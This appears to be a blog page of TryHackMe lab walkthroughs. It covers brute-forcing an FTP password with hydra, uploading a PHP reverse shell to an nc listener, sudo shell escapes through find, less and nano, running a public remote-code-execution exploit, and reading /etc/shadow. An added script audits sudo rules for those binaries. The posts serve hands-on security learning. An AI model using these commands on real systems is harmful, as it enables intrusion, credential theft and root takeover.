Showing posts with label jr.penetration tester. Show all posts

Tuesday, March 22, 2022

TryHackMe - h4cked - walkthrough

H4cked is one of the easy rooms on TryHackMe.com. In Task 1 we are given a pcap file of the attack on the VM. Most of the answers in Task 1 are found in the pcap file, which you open with Wireshark. In Task 2 you try to regain access to the VM the same way the hacker did in Task 1.
  1. We use hydra to crack the new password with the following command:

    hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://target_IP

  2. We log in to the FTP server and download shell.php (get shell.php is the command), change the IP and port to those of our attack box, and upload it back (put shell.php).
  3. Before starting the PHP script we need to start an nc listener on the attacking box with

    nc -lvnp port_number

  4. Now we are ready to start the PHP script shell.php from the browser:

    IP_target_machine/shell.php

  5. We get a reverse shell spawned in the terminal. With the whoami command we check which user we are, then we can use

    su jenny

    and log in with the password we cracked before with hydra.
  6. After that we can use

    sudo su

    and we have root access; with this we can read the root flag.
I hope anyone stuck on any step of solving this room finds this walkthrough useful.

Saturday, February 19, 2022

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest types of PrivEsc tasks.
With the command:

sudo -l

we check what services we can run as root, and with this info we can answer Q1.
From the output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to GTFOBins to check, for each service/program, how we can gain root access to the system.
  • find
    sudo find . -exec /bin/sh \; -quit

  • less
    sudo less /etc/profile
    !/bin/sh

  • nano
    sudo nano
    ^R^X
    reset; sh 1>&0 2>&0


Note about getting root via nano: enter one command at a time. ^R is CTRL + R and ^X is CTRL + X.
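The same check from the defender's side, as an added example that is not part of the original post: the script reads `sudo -l` output and lists every rule that grants one of the three programs used above (or a blanket `ALL`), so those sudoers entries can be reviewed or removed. The sample output, user name and host name are constructed, and the program list covers only the binaries named in this post.

```shell
#!/bin/sh
# Binaries this post escalates through, plus a blanket ALL rule.
SHELL_ESCAPE_BINS="find less nano ALL"

# Constructed sample of `sudo -l` output (user, host and rules are made up).
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for alice on labhost:
    env_reset, mail_badpass

User alice may run the following commands on labhost:
    (ALL : ALL) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/less, /usr/bin/nano
    (root) /usr/bin/systemctl status nginx
EOF
}

# Read `sudo -l` output on stdin; print "REVIEW <rule>" for each risky grant.
audit_sudo_l() {
    in_rules=0
    while IFS= read -r line; do
        case $line in
            *"may run the following commands"*) in_rules=1; continue ;;
        esac
        [ "$in_rules" -eq 1 ] || continue
        # Rule lines look like "(runas) [TAG:] cmd[, cmd...]".
        case $line in
            *"("*") "*) rest=${line#*") "} ;;
            *) continue ;;
        esac
        # Strip tags such as NOPASSWD:, then handle one command per line.
        printf '%s\n' "$rest" | sed -E 's/^([A-Z_]+: *)+//' | tr ',' '\n' |
        while IFS= read -r entry; do
            entry=${entry#"${entry%%[! ]*}"}   # trim leading blanks
            cmd=${entry%% *}                   # command path without arguments
            bin=${cmd##*/}                     # basename, so any install path matches
            case " $SHELL_ESCAPE_BINS " in
                *" $bin "*) printf 'REVIEW %s\n' "$entry" ;;
            esac
        done
    done
}

sample_sudo_l | audit_sudo_l
```

On a real host, feed it live output with `sudo -l | audit_sudo_l` and extend `SHELL_ESCAPE_BINS` with any other program that can spawn a shell.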
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

so that we find the path to the flag2.txt file.
To answer Q3 we need to check GTFOBins to get the command.
To answer Q4 we open /etc/shadow to find the answer. I hope this post is helpful for anyone stuck at solving this task.

Sunday, January 30, 2022

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is an online platform for learning cyber security, using hands-on exercises and labs.
This post refers to Task 5 - Practical: Manual Exploitation, which is part of the Exploit Vulnerabilities module in the THM Jr Penetration Tester course.
Task 5 is the final task in this submodule and shows a practical example of the things you learned in the previous tasks.

First step: start the VM that you will try to exploit; as the description says, it requires a few minutes to boot up. If you use the AttackBox on their site, don't forget to start it as well.

Second step: to answer Q1 you just need to open the website that is hosted on the VM you started in the first step. Scroll down to the bottom of the page and voila, you will find the name and version of the website.

Third step: now that you know the website version, you need to find a way to exploit it and gain access. You could also use online tools, but Task 5 is aimed at using the searchsploit tool, which is installed and ready to use on the AttackBox machine. We use the following command:

searchsploit online book store

We get 4 different results, but we choose the last one from the list, which offers remote code execution.


Fourth step - To start the exploit you will use the following command:

python name_of_script.py VM_IP

Since I was not in the same directory as the exploit script, I got an error that the exploit script was not found, so I used:

locate 47887.py

With that I found the correct location of the exploit script, and then I could run the exploit script correctly without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with the exploit, and in a matter of seconds you get access to the shell of the VM.

Fifth step - finding the flag.txt file and the answer to Q3 of this task.
This did not require much searching since the file is located in the current folder, and I used

cat flag.txt

to display the content of the flag.txt file. I hope that this post is helpful for anyone trying to solve this challenge.
